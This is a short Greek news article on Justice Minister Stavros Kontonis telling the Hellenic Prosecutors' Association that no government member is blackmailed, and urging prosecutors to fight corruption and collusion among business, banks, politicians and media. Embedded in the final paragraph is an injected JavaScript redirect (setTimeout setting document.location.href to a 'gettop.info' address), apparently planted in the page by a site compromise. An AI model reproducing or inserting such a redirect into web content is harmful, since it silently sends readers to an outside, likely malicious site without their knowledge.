Κοντονής: Κανένα μέλος της κυβέρνησης δεν εκβιάζεται

0
24

 

Ομιλία απηύθυνε στην ετήσια γενική συνέλευση της Ένωσης Εισαγγελέων Ελλάδος (ΕΕΕ) ο υπουργός Δικαιοσύνης και τέως υφυπουργός Αθλητισμού Σταύρος Κοντονής ο οποίος αναφερόμενος στη διαπλοκή που αντιμετώπισε επεσήμανε: «Πρώτα ο πρωθυπουργός αλλά και κανένα μέλος της κυβέρνησης δεν εκβιάζεται, δεν συναλλάσσεται. Δεν τους φοβόμαστε».

Όπως τόνισε ο υπουργός, με άθλια δημοσιεύματα νομίζουν ότι θα μας κάμψουν και σε αυτόν τον δρόμο καλούμε τους εισαγγελικούς και δικαστικούς λειτουργούς να δώσουμε τη μάχη κατά της διαπλοκής που είναι σε μεγάλο βαθμό υπεύθυνη γι αυτή την κατάσταση.

Επιπλέον ανέφερε και ότι αυτήν την περίοδο κορυφώνεται η αντιπαράθεση της κυβέρνησης με το σύστημα της διαπλοκής που ενδημεί επί χρόνια στη χώρα μας και το εγκατέστησαν οι προηγούμενες κυβερνήσεις.

«Σ‘ εσάς δεν προσβλέπει η Κυβέρνηση μόνο, αλλά πρώτα η κοινωνία γιατί τον αγώνα ενάντια στη διαφθορά πρέπει να τον δώσετε εσείς. Ο αγώνας βρίσκεται στην κορύφωση του όπως και ο αγώνας ενάντια στη διαπλοκή γιατί τα οικονομικά συμφέροντα δεν είναι μόνα τους. Αυτό το ιερό τρίγωνο των οικονομικών συμφερόντων, των Τραπεζών, του πολιτικού προσωπικού που εύκολα συνέπραττε σε αυτή την κατάσταση και όλων εκείνων που λειτουργούσαν ως εκπρόσωποι των ΜΜΕ πρέπει να σπάσει και διαρραγεί. Αυτά τα πρόσωπα βλέπουν ότι δεν υπάρχει Κυβέρνηση πρόθυμων απέναντι της» είπε. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here